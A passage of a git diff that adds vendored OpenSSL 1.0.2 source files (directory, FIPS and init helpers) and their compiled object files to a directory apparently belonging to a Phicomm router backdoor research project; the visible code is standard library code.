+        scratch.u[0] ^= tweak1.u[0];
+        scratch.u[1] ^= tweak1.u[1];
+
+        for (i = 0; i < len; ++i) {
+            u8 c = inp[16 + i];
+            out[16 + i] = scratch.c[i];
+            scratch.c[i] = c;
+        }
+        scratch.u[0] ^= tweak.u[0];
+        scratch.u[1] ^= tweak.u[1];
+        (*ctx->block1) (scratch.c, scratch.c, ctx->key1);
+#if defined(STRICT_ALIGNMENT)
+        scratch.u[0] ^= tweak.u[0];
+        scratch.u[1] ^= tweak.u[1];
+        memcpy(out, scratch.c, 16);
+#else
+        ((u64 *)out)[0] = scratch.u[0] ^ tweak.u[0];
+        ((u64 *)out)[1] = scratch.u[1] ^ tweak.u[1];
+#endif
+    }
+
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/xts128.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/xts128.o
new file mode 100644
index 0000000000000000000000000000000000000000..374365de92030bbea7dd038731f1d3cf79886d45
GIT binary patch
literal 2176
zcmbtT-EZ4e6u)kqG-bv1x(Om}Vt(+DCsr$7DhLHZoF?ft@>aB_6a>Xe(~P2}X_Yuq
zix40gN}W*PPv9>=h$kL9n9$&X^#T3@c-RLYLrACsggM8)rb);o1V_3)_xyZ5e)pVv
zUoTpv5so8~aO4ScXhkR?xp>b$*yhN+WSsmWKJc5dXt>vX;~8VYC@;)Y_j_u2ys|>O
z{Am?jsaH_4`kv_?h~oAQNG?hV>iuqdUl+aWw7Zz3yRRye>3t=hDJT;4{`BWl#kc(S
zkzaX5bmG)K3+QfLk*WK*BGPVIk*scANr~GX$ZlqiE9WzHB}u&>srM80%HY^NX1Z4;
z)BRksyt<<L^AhbA5QkXWwUiXq_f4;K2dM#CP*kd41K=Pm2B<2&ISo|d*GalNH9@&A
z=#^Vf(y=eE9Gt=$snc)c(exmNbhG07K5%vx^*#C+uQ>M^opC<bapGjhiW6gJDnb3d
z+uu<g*#Xh+G2m+HhukEpGb+Fh%d3_m8{*LmcW!<Rg+d<V6X&@fkcT<;O?X^j!-!m?
z-ly0LJQDN*>X>laq@~|NLxqaag`gsyHyM;;WbZdRWnSt4(Va4qwGtAt{T3aeT|hPH
zY(K%jdzt|!(@TV11S17~Ox}(abswSZ3eE7rHE`lL;2?y$S82gJcz(%v!B{e0H0;mF
z?99xxtS&6K8%|q(RLf}TN&S&_VCt`(OKa(=Ga(G&JS+(oUdP!B3uJ_lJ;Y+LP>zR+
zaIah>+@{2x7#~f(4}-J-Kgs^hKoBVj(t9H%A@y!7FUY%mUQpkO8$x<JVF+1wv>?2}
z#ZHX~*@BQZ1QlHJLMksvc_GP?+(qHr;mObbu-~zvFAKRx?E9l)!D;(3v|=RjPcXno
z?}85}9SgeHA94?v6FoeGUI8Y<!oCm6!vGA!$)?lN&t<hLnYsAf)8#okwC!4>+T7Z3
zh&^k~<qgZ8E0yMpWxH(Tt)fkAyX91>m+k86W&2X)<vJmgI4cmG@ex>mz(YfkVUL2p
znM+_3t+lo0RF*+I%}}pKyJoFk(VW_*L$sBOQz6=Nt3|Zx`r2Bp0a#<*scCShCIb%4
zeyP#cHk#`jwWhO0v>-!m)xOlMtkuGL|MM$DJl>hXiRJ)9iTWQ}p>MQDeF7HtCI_om
zK0pv86)J*r#X8YVi0}s)K6nG&zNWGy%=geD<SZDN^S{RHEN8kmDeR;A4-MdW29!uo
z_w0io?DOHj<o^`-<Et5T|A+xH%NMDrf04Zm8{{$=zt4cx$dT#6_$9!H&F_;T^TXIE
zKAPXK+E^;f1|qXY;oBJ-5|7y6>;NLqvih@V^hnhA2s#RzVe$Jc9-eTY495Qjq)9Ey

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_dir.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_dir.c
new file mode 100644
index 0000000..2624244
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_dir.c
@@ -0,0 +1,86 @@
+/* crypto/o_dir.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <errno.h>
+#include <e_os.h>
+
+/*
+ * The routines really come from the Levitte Programming, so to make life
+ * simple, let's just use the raw files and hack the symbols to fit our
+ * namespace.
+ */
+#define LP_DIR_CTX OPENSSL_DIR_CTX
+#define LP_dir_context_st OPENSSL_dir_context_st
+#define LP_find_file OPENSSL_DIR_read
+#define LP_find_file_end OPENSSL_DIR_end
+
+#include "o_dir.h"
+
+#define LPDIR_H
+#if defined OPENSSL_SYS_UNIX || defined DJGPP
+# include "LPdir_unix.c"
+#elif defined OPENSSL_SYS_VMS
+# include "LPdir_vms.c"
+#elif defined OPENSSL_SYS_WIN32
+# include "LPdir_win32.c"
+#elif defined OPENSSL_SYS_WINCE
+# include "LPdir_wince.c"
+#else
+# include "LPdir_nyi.c"
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_dir.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_dir.h
new file mode 100644
index 0000000..d554311
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_dir.h
@@ -0,0 +1,55 @@
+/* crypto/o_dir.h -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Copied from Richard Levitte's (richard@levitte.org) LP library.  All
+ * symbol names have been changed, with permission from the author.
+ */
+
+/* $LP: LPlib/source/LPdir.h,v 1.1 2004/06/14 08:56:04 _cvs_levitte Exp $ */
+/*
+ * Copyright (c) 2004, Richard Levitte <richard@levitte.org>
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+#ifndef O_DIR_H
+# define O_DIR_H
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+typedef struct OPENSSL_dir_context_st OPENSSL_DIR_CTX;
+
+  /*
+   * returns NULL on error or end-of-directory. If it is end-of-directory,
+   * errno will be zero
+   */
+const char *OPENSSL_DIR_read(OPENSSL_DIR_CTX **ctx, const char *directory);
+  /* returns 1 on success, 0 on error */
+int OPENSSL_DIR_end(OPENSSL_DIR_CTX **ctx);
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif                          /* LPDIR_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_dir.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_dir.o
new file mode 100644
index 0000000000000000000000000000000000000000..4cc60f084eecd47951ef321c9adb6c0bec626ccd
GIT binary patch
literal 2352
zcmbuB-D@0G6u{5!Y|TcSo3%;^w#ZUrjo1vkTCg@CJLzsRE7K(HW>H$hFxgCPaX;eh
zUD^0hg>4GM8u6i^;JYvW0e-x=kkt4m_*f*MQbeUFqLz5hoqOBKWcNi69L~MJIp^Ga
z?$_?S1#31Qi-D3DybKR|iURz4=s`OtnmHJO!*F->$-j)Uxv^LDe>awl(VN@m#vkR;
zo4t}Tylwh_pZ}4ZP5)Nm`YvZXFowNCcK4@Gh<2u7hdx8=)vr@20O_k0eazBp4eu0i
z1b{nlWqX$Y!<UH!z}?R*|Chk8J6-e>6IS<`a~r#@v3$2C<99SlnfGgO=d{_?%<gI7
zA0*{Zo11HoA^r+*Ky$O56d$ebQ^q&fCz8mZ*x62AwEWwbmW|hq<t?hPTsn^>@+q@B
zgf-#Z_;Hoi>`wc)M2>8)b8nB2eL>5&@iQM0FsL}&yLf4N3+B$AJ(Hd+ue9pCm3~Qo
zLC;KOUu=nP_S*9qJ#*^W00UsDG(n(cpPMg39H2)`)Q0wPRFc>`7a-P7#f}~xN`8nV
zpF(y_d;$2L>?})d#!WW<zGkxYjYOVJb`H(4O#E{;nP+K(jnA;u3`<U+>ynIng=~SP
zZp86(M>AMDo@3(%OBpOFT@Dy3Isw1!9r%Di>wBVzt7`T~X`=f5jCvY8bPx(YG=TS?
zt|nG>f5<R)kA&ta)(+VdsI(7J$sp**jRD*oz!wMb@&LX(fV;?P{%YQ050SM7_(Q{9
zz3S-|SXeB~mr9nMFJ7=c*I5O7&RUo;EPG*gwp3WMmy8*!V1sSDo>y<!)kekPR~vPx
zIaO>!W6iB&BDn0iE>Jvmn%t{b*4FpsMmMNb8%>uS0FI-Q(3yS&^`E^!<_V$@r@OEC
z+XPXFkDx040YMbv3{~+@38D}mMOA!@APRBXKgI76L?M0zRq-J@*eKEb$3i?j|FrN1
zy01cI7ha2SwNIco*K6EaLCd|sUQsR2tvWh)+Z^;&hdZFJG@GDT8nv2RM^<leSI4(u
zs>z+oo3j5#y``^txGNrC2VG=vuh^G8r$#5_|4SNEQ0dW|m_tT#Qm#wT3w%|Z>`_!&
z%N%N0+5}O)3k*DrmQtx3JTCbO$)hhvH8QSr58dd1oJ2!8|7&~}V`(V5|6x(%KNp7B
zR?|}UOo)YDKT-~1*vFUdHNAFpzQXdcj8BIlw$=J6yn+pKjmC>#E#z(GC~Y*J-k*N^
zw<!M~sCA+JqgWNM_OIXAG*m`T=v!F_-6?vLqw&O|dxr@Al<*pLLL$@MCy!#QU;KM=
M{?+@QK_eRfFBWq(MgRZ+

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_dir_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_dir_test.c
new file mode 100644
index 0000000..7cdbbbc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_dir_test.c
@@ -0,0 +1,68 @@
+/* crypto/o_dir.h -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Copied from Richard Levitte's (richard@levitte.org) LP library.  All
+ * symbol names have been changed, with permission from the author.
+ */
+
+/* $LP: LPlib/test/test_dir.c,v 1.1 2004/06/16 22:59:47 _cvs_levitte Exp $ */
+/*
+ * Copyright (c) 2004, Richard Levitte <richard@levitte.org>
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+#include <stddef.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <errno.h>
+#include "e_os2.h"
+#include "o_dir.h"
+
+#if defined OPENSSL_SYS_UNIX || defined OPENSSL_SYS_WIN32 || defined OPENSSL_SYS_WINCE
+# define CURRDIR "."
+#elif defined OPENSSL_SYS_VMS
+# define CURRDIR "SYS$DISK:[]"
+#else
+# error "No supported platform defined!"
+#endif
+
+int main()
+{
+    OPENSSL_DIR_CTX *ctx = NULL;
+    const char *result;
+
+    while ((result = OPENSSL_DIR_read(&ctx, CURRDIR)) != NULL) {
+        printf("%s\n", result);
+    }
+
+    if (errno) {
+        perror("test_dir");
+        exit(1);
+    }
+
+    if (!OPENSSL_DIR_end(&ctx)) {
+        perror("test_dir");
+        exit(2);
+    }
+    exit(0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_fips.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_fips.c
new file mode 100644
index 0000000..f56d5bb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_fips.c
@@ -0,0 +1,96 @@
+/*
+ * Written by Stephen henson (steve@openssl.org) for the OpenSSL project
+ * 2011.
+ */
+/* ====================================================================
+ * Copyright (c) 2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+# include <openssl/fips_rand.h>
+# include <openssl/rand.h>
+#endif
+
+int FIPS_mode(void)
+{
+    OPENSSL_init();
+#ifdef OPENSSL_FIPS
+    return FIPS_module_mode();
+#else
+    return 0;
+#endif
+}
+
+int FIPS_mode_set(int r)
+{
+    OPENSSL_init();
+#ifdef OPENSSL_FIPS
+# ifndef FIPS_AUTH_USER_PASS
+#  define FIPS_AUTH_USER_PASS     "Default FIPS Crypto User Password"
+# endif
+    if (!FIPS_module_mode_set(r, FIPS_AUTH_USER_PASS))
+        return 0;
+    if (r)
+        RAND_set_rand_method(FIPS_rand_get_method());
+    else
+        RAND_set_rand_method(NULL);
+    return 1;
+#else
+    if (r == 0)
+        return 1;
+    CRYPTOerr(CRYPTO_F_FIPS_MODE_SET, CRYPTO_R_FIPS_MODE_NOT_SUPPORTED);
+    return 0;
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_fips.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_fips.o
new file mode 100644
index 0000000000000000000000000000000000000000..eb129ea740ebb7f105eb9f34d5eb2faf58534057
GIT binary patch
literal 1776
zcmbu8PiqrF6u{pm)mClOC?Y~c_9Xu6lC6bm50bWQQYADYX)lT_n{;b~*=*RIK<hyZ
z;=!BW!%L6iK?A+$&AVT~t9VnPzBiedY}Ty@eK0fc{pP(lGjC>|TjgR((||>TyD+kt
z0vx1AdO@lMn1N~dK708`^(z6h|KO0U`m3MPeoJXyei1p#?3<t7xoExju=_BJor-vP
z2&L84CH?AVqt_8V{f=?V$j_OJJ!zWH=JQ5=;o1OW6v_m)EVdKaO6!}D0_YRt?VU%R
zM0;8TZ8xjsrYEOf<4%ZQk~07q8m&xrEi)zAg5vXvzeu%l=I=s>n}BaeNnYv13ep~V
zm*Y`sd8%<nRvJ$J2_>IAh9~bjEvq#iavIHZk$uXVAfq}_edBT+K@wj?PI)+9))1L>
zj6eAHcB>m2O(@>0)@{$<a=|W@D=W)oyHYIHtqpr)d8KUGP^nt$^?KQEby{NNY=^D@
zt5&nSJz={+;0L%63RjBW!WnG8js|jpCQ;)2_5e#hgF5@`isQSYw>1>@XU^vZBi!?Z
z)4)*#gK>woz->E*aCZe5TaIwRXoMjcP2cm}4zi9fTm#?mTqvC86J<Z{^o(xccilkj
zfgv-vJN9<qc=Un(Uvx}CZ<p)E84F6`kvaKBC5HypvJi!+e^kX<Q=Hxx#qx{1sQ4Ad
z<3C|v&BurM`Zv*ma{g<)iLsP3k1Z<u%D54QsPp<fE=5?>^-a`>=p4uBJ}UHkqi>7m
z4yZ%XWk2e;eoPvuP|kS#XXQ|3M>WRdA0bb=zpN@K*M;tnVmY4gFKKOBN>>N1s*(QS
jsf2i9@w-C=U3H*384*$GhU6@2N$~{*+e6QR5|95438ayy

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_init.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_init.c
new file mode 100644
index 0000000..2088388
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_init.c
@@ -0,0 +1,83 @@
+/* o_init.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <e_os.h>
+#include <openssl/err.h>
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+# include <openssl/rand.h>
+#endif
+
+/*
+ * Perform any essential OpenSSL initialization operations. Currently only
+ * sets FIPS callbacks
+ */
+
+void OPENSSL_init(void)
+{
+    static int done = 0;
+    if (done)
+        return;
+    done = 1;
+#ifdef OPENSSL_FIPS
+    FIPS_set_locking_callbacks(CRYPTO_lock, CRYPTO_add_lock);
+    FIPS_set_error_callbacks(ERR_put_error, ERR_add_error_vdata);
+    FIPS_set_malloc_callbacks(CRYPTO_malloc, CRYPTO_free);
+    RAND_init_fips();
+#endif
+#if 0
+    fprintf(stderr, "Called OPENSSL_init\n");
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_init.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_init.o
new file mode 100644
index 0000000000000000000000000000000000000000..a0bb51b7cc88a18762fe5e2a7d8c2487d2d7b3d6
GIT binary patch
literal 1536
zcmbtS%}N|W5Uz1d+!%vD<PcC~y+}f0GpmA8Ff51)B1RM;mmst2B#Q2g%=UnK(1Vv8
zeT+PYkV9S}M_(c2BIaPKdaA~rW|B(^X6pOCuBxu?u8ZaMl^)LnF%RCs0}~bCy5|8m
z4Q#?Q7=T}c<9C;fM#%cVKO#Ws-(YoVX`%jdr<KJztIw+$6-+heGD92Z(}4<RU*)pN
zg<f<+_)&$`jUB-4u1WLpBYU1Z@XoftI~npu2l{GPxD)APy!L|qzZ^B!3qS9xV*JXJ
zQxDQbIm<U)m$iPRo~6?n#C&)xu;hK{D{&z{)C88iZ*Hk1nR^(q`Y-Mx**%C4v}(g%
z5=Uyb5d`plb9rNXd)+KZ73qwgnR@<xpW7e@h<?j@-O{bm08ri2jt*Psb(;HqL1}ap
zDjl6@P<x>cLAAPFQ0=7CiDJ~^L`MqWeyXd(_964nai)&b<Ty(8DJWAR+TZ<@hMkBz
z_&-PIpqY^KOSLA0;vSh(tZk!6=)Rh^h`7d=60n}n1?tSD?j&-m=}y=Oj&q&6{~HXT
znt#i;=Z|W+yn!0kls+kjO!j}B)8a4ti(kMM!9@^)OPg5Oja|bvn*P!ZA^*ZTb@t-q
z{)D#>P)#@gD+jpea`Qi8T-E!%<%04~^nR2p`Jz|tO<Vt<A6ktM{1ma&AYJmGAa>u5
b)^9j(f{0}-7s@cAs{Bpv|EP$}ft&vae$-;%

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_str.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_str.c
new file mode 100644
index 0000000..4e2d096
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_str.c
@@ -0,0 +1,116 @@
+/* crypto/o_str.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2003.
+ */
+/* ====================================================================
+ * Copyright (c) 2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
